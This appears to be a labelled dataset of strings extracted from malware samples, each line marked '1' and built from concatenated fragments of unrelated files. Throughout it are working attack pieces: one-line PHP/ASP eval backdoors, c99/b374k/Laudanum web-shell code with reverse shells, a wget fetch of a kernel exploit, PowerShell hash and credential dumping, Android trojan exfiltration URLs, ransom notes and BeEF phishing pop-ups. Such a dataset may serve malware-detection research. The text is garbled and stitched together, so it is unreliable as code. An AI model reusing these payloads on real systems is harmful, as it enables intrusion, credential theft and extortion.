fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 b.qcrypt version 1.0encrypt and decrypt using rsa cryption alghorithm.crypt --generate_keys <private_key_file_name> <public_key_file_name>crypt --encrypt <public_key_file_name> <plain_file_name> <cipher_file_name>crypt --decrypt <private_key_file_name> <cipher_file_name> <plain_file_name>crypt --generate_keys private.key public.keycrypt --encrypt public.key plain.txt cipher.enccrypt --encrypt private.key cipher.enc recovered.txt
1 /h.ghttpheadget/library/launchedmy connect error with no ip!send file is failed****************************you have got it!****************************tw96awxsys81ljagkfdpbmrvd3m7ifu7ifdpbmrvd3mgtlqgns4xoyblbi1vuzsgcny6ms44ljaunskgr2vja28vmjawnja3mzegrmlyzwzvec8xljuumc41iezsb2nrlzauny40ljetw96awxsys81ljagkfgxmtsgvtsgtgludxggmi40ljitmibpntg2oyblbi1vuzsgbte4ksbhzwnrby8ymdaxmdezmsbozxrzy2fwztyvni4wmq==[\"cookie\",\"\"realauth=\"location\"];d3rmzxhlinclude '../../../../../../../../../../app/mage.php'; mage::app(); $q = mage::getmodel('sales/quote_payment')->getcollection();../../../../../../app/mage.php'; mage::app(); var_dump(mage::getmodel('sales/order')rul6qttvep5eqf9usxfjjgoovdnwfsgohdgluk+4onwxqnbgniqlttfyrgkb8d9base64_decode('b25lcgfnzxxny19hzg1pbg==')dnechdqbwtxu3dsmda1vmz1c29wuvfxduhpt0xyb0k3zdjywmfvzlf5y0zeehv4k2fnvmy0outjbzhnc0u3hktvvibst2mtgyrjy0vmzlqwo3d1vlafjvnvnnsgzuvuhkzxdebgxjutlxwwlqwst0cetacuzosxf4crb2jhatjvdurmnlhqz1zltgvjvnfobvdnmk5nbdlvbedbqvzkrzj1wmzusjdvownwwurzylz0l1btncteval(base64_decode($_posteval($undecode($tongji))<strong>www.zone-org</strong>echo eval(urldecode($dez = $pwddir.\"/\".$real;copy($uploaded, $dez);@$_($_request['eval(xxtea_decrypt** scam redirector$ooooo00oo0000oo0curl_close($cu);eval($o);};die();
1 please restart your computer and wait for instructions for decrypting your files kscdsromantic9%9r9f9q9i
1 d$o* encrypted log found. an encryption key must be providedencryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'(
1 ati.jo840112-cras8468-11150923-pci8273vprincpespr!ncpeshastati\\temp\\~v3.logbrowser password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
1 n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<t;<<t;<<t<<<t<<>>><<<c/a/a/b/a/main/start.classcon g/con g.perljava/textito.isnmain.classpkplugins/server.classpkidpkconfig.inipkpassword.inipkloadstub.classpkloadstubdecrypted.classpkloadpassword.classpkdecryptstub.classpkclassloaders.classpkutil/oshelperalienspyconfig.xmlpkkey.classpksvd$1.classpksvd$2.classpkmensaje.classpkinic$shutdownhook.classuninstall.jarpkresources/icono.pngpkbss_serverclick_delay
1 k%02u:%02u:%02u.%03u-%4u: * privateencrypt -> publicdecrypt failedselect processid,description,executablepath from win32_process~debl00l.tmp\\\\.\\mailslot\\c54321\\\\.\\mailslot\\c12345nowmutexsystem\\currentcontrolset\\services\\msexchangeis\\parametersprivate000000005017c31b7c7bcf97ec86019f5026be85fd1fb192f6f4237b78db12e7dffb07748bff6432b3870681d54bef44077487044681fb94d17ed04217145b9800000000e2c9adbd8f470c7320d28000353813757f58860e90207f8874d2eb49851d3d3115a210da6475ccfc111dcc05e4910e50071975f61972dce345e89d88usage: %s -i inputfile -o outputfile [-f functionordinal] [-a functionargument] [-t threadoption]the output payload \"%s\" has a size of %d-bytes.error: fwrite(%s) failed on ucpayloadload and execute implant within the existing threaddriver startdeviceiocontrol error: %dphlookusage: setouraddr <input file> <output file> <protocol> [ip/ipx address]replaced default ip address (127.0.0.1) with local ip address %d.%d.%d.%d\
1 are you alert enough to be using nmap? have some coffee or jolt(tm).shinysoft limited1shinysoft limited0wellington1wainuiomata156 wright st1utn-userfirst-objectnew zealand1failed to get temp file for source aes decryptionfailed to get encryption header for pwd-protectfailed to get filetimefailed to delete temp file for password decoding (3)<iconfile>c:\\windows\\app.ico</iconfile>failed to read the entire file<versioncreatedby>14.4.0</versioncreatedby><progresscaption>run &quot;executor.bat&quot; once the shell has spawned.</prunning zip pipeline...<fintitle /><autotemp>0</autotemp><defaultdir>%temp%</defaultdir>aes encrypting...<unzipdir>%temp%</unzipdir>/bypassuac/bypassuac/bypassuac_utils.cpp/bypassuac/bypassuacdll/bypassuacdll.aps/bypassuac/bypassuac/bypassuac.icob
1 form.z1form.z2tobinary(tobase64(\"->\"&\"|\")createfile szconfigpath errordecrypt old sname error is running!
1 gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 nullfilenameusage: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]you may enter between 1 and 6 ports to change the defaults.sprqwvusage: %s [d|e] session_key ciphertextwhere session_key and ciphertext are strings of hexd = decrypt mode, e = encrypt modebad mode, should be 'd' or 'e'wshtcpip.wshgetsocketinformation\\\\.\\%hs.?avresultip@mini_mcl_cmd_netconnections@@c
1 rookie/1.0$processinfo.arguments=\"-nop -c $downloadcradle\"$powershellexe=$env:windir+'\\syswow64\\windowspowershell\\v1.0\\powershell.exe'$postdata=\"script=println+new+processbuilder%28%27\"+$($cmd)+\"$url = \"http://\"+$($rhost)+\":\"+$($port)+\"/script\"$cmd = [system.web.httputility]::urlencode($cmd)$null = $enumbuilder.defineliteral('logon', 0x2000)$enumbuilder = $modulebuilder.defineenum('sspi.secpkg_flag', 'public', [int32])$enc = get-posthashdumpscript$lmhash = decryptsinglehash $rid $hbootkey $enc_lm_hash $almpassword;$rc4_key = $md5.computehash($hbootkey[0..0x0f] + [bitconverter]::getbytes($rid) + $lmntstr);install-ssp -path .\\mimilib.dll$finalshellcode.length@(0x60,0xe8,0x04,0,0,0,0x61,0x31,0xc0,0xc3)@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,$targetmethod.invoke($null, @(0x11112222)) | out-null$poolpasswordcmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool= \"tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqinvoke-command -scriptblock $remotescriptblock -argumentlist @($pebytes64, $pebytes32, \"void\", 0, \"\", $exeargs)$base64decoded = [convert]::frombase64string($cpassword)$xmlfiles += get-childitem -path \"\\\\$domaincontroller\\sysvol\" -recursefunction get-decryptedcpassword {$up = test-connection -count 1 -quiet -computername $computer $out | add-member noteproperty 'password' $passwordexploit-jboss$url = \"http$($ssl)://\" + $($rhost) + ':' + $($port)\"/jmx-console/htmladaptor?action=invokeop&name=jboss.system:servicehttp://blog.rvrsh3ll.netremote url to your own warfile to deploy.[dllimport(\"advapi32.dll\", setlasterror = true, entrypoint = \"credreadw\"[string] $msg = \"failed to enumerate credentials store for user '$env:username'\"rtn = credread(\"target\", cred_type.generic, out cred);egress -ip $ip -port $c -delay $delay -protocol $protocol\\powershellrunner.pdbp
1 [mimikittenz.memprocinspector]process_all_access = process_terminate | process_create_thread | process_set_sessionid | process_vm_operation |intptr processhandle = minterop.openprocess(minterop.process_wm_read | minterop.process_query_information, false, process.id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[dllimport(\"kernel32.dll\", setlasterror = true)]3aesversonex12cupdategates11cupdatebillzn8cutility7decryptepcipkcizn13cthreadattack5startep11ccmdmessagemr.blackvers0nex:%s|%d|%d|%sprivmsg %s :[std]hitting %snotice %s :tsunami <target> <secs>notice %s :i'm having a problem resolving my host, someone will have to spoofs me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
1 seven_legion@india.comfor decrypt files
1 *mlt* = %*ip* = %*victimo* = %*name* = %[start][data]we control your digital worldrc4initializerc4decrypts
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = 